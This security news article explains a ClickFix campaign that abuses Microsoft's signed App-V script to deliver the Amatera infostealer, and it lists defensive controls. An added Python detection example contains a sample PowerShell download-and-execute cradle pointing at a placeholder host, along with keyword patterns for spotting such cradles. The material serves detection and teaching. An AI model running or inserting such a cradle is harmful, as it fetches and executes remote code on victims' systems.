PROBABLYPWNED
Malware | January 29, 2026 | 4 min read

ClickFix Attacks Now Abuse Windows App-V to Deliver Malware

New campaign combines fake CAPTCHA pages with signed Microsoft scripts to bypass security tools and install Amatera infostealer on enterprise systems.

James Rivera

A new ClickFix campaign is abusing Windows Application Virtualization scripts to slip past enterprise security controls. Researchers at BlackPoint Cyber documented the attack chain this week: it tricks users with fake CAPTCHA pages and then leverages signed Microsoft infrastructure to deploy the Amatera information stealer.

The technique highlights how attackers combine social engineering with living-off-the-land binaries to evade endpoint protection.

How the Attack Works

ClickFix attacks exploit what researchers call "verification fatigue"—users encounter so many CAPTCHAs daily that another one barely registers as suspicious. The fake verification page instructs victims to open the Windows Run dialog and paste a command to prove they're human.

Standard ClickFix campaigns invoke PowerShell directly. This variant takes a different path.

Instead of running PowerShell, the malicious command calls SyncAppvPublishingServer.vbs—a legitimate signed Microsoft script associated with Application Virtualization (App-V). Because the script carries Microsoft's signature, security tools that block suspicious PowerShell execution may let it pass.

The App-V script then executes the actual payload, downloading Amatera from attacker-controlled infrastructure. The malware runs without touching disk, operating entirely in memory after initial download.

What Is Amatera?

Amatera emerged in June 2025 as an evolution of ACR Stealer (also known as AcridRain). It operates as malware-as-a-service, with subscriptions ranging from $199 monthly to $1,499 annually.

The infostealer targets a broad range of applications:

  • Web browsers for saved credentials, session cookies, and stored credit card data
  • Cryptocurrency wallets including browser extensions and desktop applications
  • Messaging applications for conversation history and contact lists
  • FTP clients for stored server credentials
  • Email services for account access

According to eSentire research, Amatera employs "advanced evasion techniques such as WoW64 SysCalls to circumvent user-mode hooking mechanisms commonly used by sandboxes, Anti-Virus solutions, and EDR products." The malware specifically targets weaknesses in how security tools monitor 32-bit processes on 64-bit Windows systems.

Once data collection completes, everything is exfiltrated to attacker infrastructure. Victims often don't realize their browsers held the keys to dozens of accounts until those credentials appear in underground markets or fuel follow-on attacks.

Why App-V Matters

Living-off-the-land techniques aren't new, but App-V abuse represents a less commonly weaponized vector. Most security teams have tuned their defenses around PowerShell and WMI. Signed Microsoft scripts that legitimately call PowerShell create a blind spot.

The SyncAppvPublishingServer.vbs script exists to manage application publishing in enterprise environments using Microsoft's App-V technology. It's present on systems where App-V is installed—typically managed Windows endpoints in corporate environments.

Attackers can abuse it because:

  1. The script is signed by Microsoft
  2. It legitimately executes PowerShell code
  3. Security tools may whitelist it based on signature validation
  4. Few organizations monitor App-V script execution specifically

This mirrors how attackers previously abused other LOLBins like mshta.exe, wmic.exe, and certutil.exe before defenders caught on.

Defending Against ClickFix

The fundamental defense is user awareness. No legitimate website will ever ask users to paste commands into the Windows Run dialog. Train users to recognize this as an immediate red flag, regardless of how convincing the CAPTCHA page appears.

Technical controls that help:

  1. Restrict Run dialog access through Group Policy where operationally feasible
  2. Remove App-V components from systems that don't require application virtualization
  3. Enable PowerShell Script Block Logging to capture commands executed through indirect paths
  4. Monitor for TLS SNI mismatches where the HTTP Host header doesn't match the destination IP
  5. Block or sandbox unknown websites presenting CAPTCHA-style challenges

For organizations that can't restrict the Run dialog, application whitelisting that prevents unauthorized script execution provides a fallback.
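The process chain described above (Run dialog, script host, SyncAppvPublishingServer.vbs, PowerShell, in-memory download) and the Script Block Logging control can be turned into concrete detection logic. The following is an added example, not code from the article or from BlackPoint Cyber. It assumes Sysmon-style process-creation records and PowerShell Event ID 4104 script-block records reduced to a handful of fields; the field names, process IDs and log contents are constructed for illustration, and the rule names are arbitrary.

```python
import re
from dataclasses import dataclass

# Indicators for the chain in the article: a pasted Run-dialog command launches a
# script host on SyncAppvPublishingServer.vbs, which in turn starts PowerShell.
LOLBIN_SCRIPT = "syncappvpublishingserver.vbs"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # a Run-dialog command is launched from explorer
# Download-and-execute keywords that a publishing refresh has no reason to contain.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string", re.I)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style; fields assumed)."""
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


@dataclass
class ScriptBlockEvent:
    """Minimal PowerShell script-block record (Event ID 4104 style; fields assumed)."""
    pid: int
    text: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(procs, blocks):
    """Return (rule, pid, detail) findings in rule order."""
    findings = []
    # Every script-host process that ran the App-V publishing script.
    appv_hosts = {p.pid for p in procs
                  if basename(p.image) in SCRIPT_HOSTS and LOLBIN_SCRIPT in p.cmdline.lower()}
    # Rule 1: the App-V script launched from an interactive shell (a pasted command),
    # rather than from the App-V client service.
    suspicious_hosts = set()
    for p in procs:
        if p.pid in appv_hosts and basename(p.parent_image) in INTERACTIVE_PARENTS:
            suspicious_hosts.add(p.pid)
            findings.append(("appv_script_from_interactive_parent", p.pid, p.cmdline))
    # Rule 2: PowerShell whose parent is one of those suspicious script hosts.
    ps_children = set()
    for p in procs:
        if basename(p.image) in POWERSHELL and p.parent_pid in appv_hosts:
            ps_children.add(p.pid)
            if p.parent_pid in suspicious_hosts:
                findings.append(("powershell_spawned_by_appv_script", p.pid,
                                 f"parent pid {p.parent_pid}"))
    # Rule 3: a download cradle in the script blocks of any PowerShell reached through
    # the App-V script. This is what Script Block Logging buys you: the command line of
    # the script host says nothing about what the PowerShell actually ran.
    for b in blocks:
        if b.pid in ps_children and CRADLE_RE.search(b.text):
            findings.append(("download_cradle_in_script_block", b.pid, b.text[:60]))
    return findings


# Constructed sample telemetry: one ClickFix-style chain and one benign refresh.
MALICIOUS_PROCS = [
    ProcessEvent(2002, r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "<argument redacted>"',
                 1001, r"C:\Windows\explorer.exe"),
    ProcessEvent(2003, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command <redacted>", 2002,
                 r"C:\Windows\System32\wscript.exe"),
]
BENIGN_PROCS = [
    ProcessEvent(3001, r"C:\Windows\System32\cscript.exe",
                 r"cscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs",
                 400, r"C:\Windows\System32\svchost.exe"),
    ProcessEvent(3002, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -Command <redacted>", 3001, r"C:\Windows\System32\cscript.exe"),
]
SAMPLE_BLOCKS = [
    ScriptBlockEvent(2003, "IEX((New-Object Net.WebClient).DownloadString('https://constructed.invalid/p'))"),
    ScriptBlockEvent(3002, "Sync-AppvPublishingServer -ServerId 1 -Force"),
]


def run_sample():
    """Run the rules over the constructed telemetry."""
    return detect(MALICIOUS_PROCS + BENIGN_PROCS, SAMPLE_BLOCKS)


if __name__ == "__main__":
    for rule, pid, detail in run_sample():
        print(f"{rule:40} pid={pid} {detail}")
```

Rule 1 alone catches the pasted command without depending on what PowerShell does afterwards; rule 3 only fires when Script Block Logging is enabled, which is why the article lists it among the controls. The benign refresh from svchost.exe produces no findings, so the rules can be deployed without alerting on normal App-V client activity.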

The Bigger Picture

ClickFix has evolved steadily since first appearing. We've covered campaigns where attackers distributed infostealers through fake job interviews using similar social engineering tactics. The Lazarus group adopted the technique for targeted operations; this campaign takes a spray-and-pray approach to enterprise credential theft.

The combination of MaaS infostealers with creative delivery mechanisms creates a mature ecosystem. Operators don't need sophisticated capabilities themselves—they purchase Amatera subscriptions, customize delivery through available techniques, and monetize stolen data through established underground channels.

Expect continued innovation in LOLBin abuse as defenders improve PowerShell monitoring. The arms race between security tooling and evasion techniques shows no signs of slowing.
